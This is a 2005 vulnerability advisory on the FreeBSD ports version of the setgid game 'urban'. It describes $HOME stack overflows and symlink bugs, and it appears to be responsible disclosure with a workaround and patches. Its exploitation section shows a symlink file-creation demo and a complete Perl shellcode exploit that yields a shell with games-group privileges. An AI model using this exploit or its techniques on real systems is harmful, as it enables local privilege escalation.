Multiple vulnerabilities in FreeBSD 'urban' September 4th, 2005 I. BACKGROUND URBAN is a bloody, violent sidescrolling shoot-em-up in which you're a renegade military cyborg fighting your way out of the military base where you were created. 'urban' is maintained and distributed as a FreeBSD ports package, as well as having its own developer and official tarball release. The FreeBSD ports package is installed setgid games by default, to allow for global score files. Urban is vulnerable to several stack overflow and symlink vulnerabilities, giving rise to the possibility of privilege escalation to gid games. [* urban's official release, available at , does *not* install urban with setgid games privileges by default, so only the FreeBSD ports package is susceptable to the vulnerabilities later outlined in this advisory *] II. DESCRIPTION Urban is vulnerable to a stack overflow when handling the $HOME environmental variable. Since urban is installed with setgid games privileges, privilege escalation is possible. The overflow occurs when urban copies the contents of the user's $HOME environmental variable into a fixed-length buffer without bounds checking (sprintf is used). [ ... ] sprintf(filename, "%s/.urban", getenv("HOME")); [ ... ] sprintf(filename, "%s/.urban/savegame.dat", getenv("HOME")); [ ... ] Several other less likely stack overflows may occur, such as in the copying of the $USER environmental variable in certain circumstances. [ ... ] if(getenv("USER") != NULL) strcpy(Name, getenv("USER")); [ ... ] Urban is also vulnerable to some less serious symlink bugs, due to the following of symbolic links when creating certain high score and save game files. [ ... ] /* Create dir */ sprintf(filename, "%s/.urban", getenv("HOME")); [ ... ] mkdir(filename, S_IRUSR | S_IWUSR | S_IXUSR); sprintf(filename, "%s/.urban/savegame.dat", getenv("HOME")); if((fs = fopen(filename, "wb")) == NULL) [ ... ] Since urban has the setgid games privileges, an attacker can craft an appropriate symbolic link (i.e. ~/.urban/savegame.dat) which can lead to creation and/or truncation of files with the privileges of gid games. This may allow attackers to edit global score files and possibly leverage further attacks (i.e. exploit symlink bugs in games which require write-access to /var/games to exploit). It is worth noting once more that the official tarball of urban does *not* install urban with setgid games privileges, but the FreeBSD ports version does (/usr/ports/games/urban). III. EXPLOITATION The symbolic link bug outlined earlier can be exploited by creating a suitable symbolic link in one's home directory, such as ~/.urban/savegame.dat. bash-2.05b# ls -l /var/games/helloworld ls: /var/games/helloworld: No such file or directory bash-2.05b# ln -s /var/games/helloworld savegame.dat bash-2.05b# ls -l total 0 lrwxr-xr-x 1 root wheel 21 Sep 4 16:17 savegame.dat -> /var/games/helloworld bash-2.05b# urban [ output truncated ] bash-2.05b# ls -l /var/games/helloworld -rw-r--r-- 1 root games 0 Sep 4 16:17 /var/games/helloworld It is possible to write to any file writable by group games. Such may allow editing of score files and the possibility of further privilege escalation (i.e. exploitation of bugs which require access to score file dirs). The stack overflow in handling of the user's $HOME environmental variable is exploitable as a vanilla buffer overflow. su-2.05b$ export HOME=`perl -e 'print "a"x2000'` su-2.05b$ gdb -q urban (no debugging symbols found)...(gdb) r Starting program: /usr/X11R6/bin/urban Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1 (LWP 100144)] 0x61616161 in ?? () (gdb) Exploitation is straight forward. I have written a simple exploit which yields a shell with egid (effective group id) privileges. -- urban.pl #!/usr/bin/perl # FreeBSD /usr/ports/games/urban local stack overflow exploit # 'urban' is vulnerable to a stack overflow when handling # the $HOME environmental variable, thus allowing privilege # escalation to gid games since 'urban' is setgid 'games'. # Shellcode and NOPs are placed inside an environmental variable # ($HACK) and $HOME is crafted such that 'urban' will return into # the code in $HACK. The address of $HACK in the environment may # need some investigating (i.e. using gdb). # # shaun@213$ id # uid=1003(shaun) gid=1004(shaun) groups=1004(shaun) # shaun@213$ perl urban.pl # $ id # uid=1003(shaun) gid=1004(shaun) egid=13(games) groups=13(games), 1004(shaun) # $ $ret = 0xbfbfeece; #works on my FreeBSD 5.4-RELEASE system $nop = "\x90"; $shellcode = "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02/bin/sh.-c.sh"; for($i = 0; $i < 100; $i++) { $buffer .= $nop; } $buffer .= $shellcode; local($ENV{'HACK'}) = $buffer; $ret = pack("l", $ret); local($ENV{'HOME'}) = "a"x1036 . $ret; exec("urban"); # run vulnerable program -- urban.pl Also available at: Below shows output of me running the exploit. su-2.05b$ id uid=1002(shaun) gid=1002(shaun) groups=1002(shaun) su-2.05b$ perl urban.pl $ id uid=1002(shaun) gid=1002(shaun) egid=13(games) groups=13(games), 1002(shaun) IV. DETECTION The latest FreeBSD ports release of urban is vulnerable. urban 1.5.3_1 Earlier versions are suspected vulnerable. The latest official release of urban, 1.5.3, contains all the bugs aforementioned, but does not install urban with setgid games privileges. V. WORKAROUND Remove setgid games privileges from the urban binary. bash-2.05b# ls -l `which urban` -r-xr-sr-x 1 root games 340224 Sep 4 16:17 /usr/X11R6/bin/urban bash-2.05b# chmod g-s `which urban` bash-2.05b# ls -l `which urban` -r-xr-xr-x 1 root games 340224 Sep 4 16:17 /usr/X11R6/bin/urban This will render global scoring unusable unless urban is run as root or games user. VI. SOLUTION I submitted information and patches to the FreeBSD ports urban maintainer, Jean-Yves Lefort, and he reports that the patches have been committed for later release. The unified patch file can be obtained from my webspace, . The patch fixes the overflows mentioned earlier, and several other possible overflows. Privileges are also dropped at the beginning of execution and restored when needed. Thanks to Jean-Yves Lefort for cooperation. Thank you for your time, Shaun.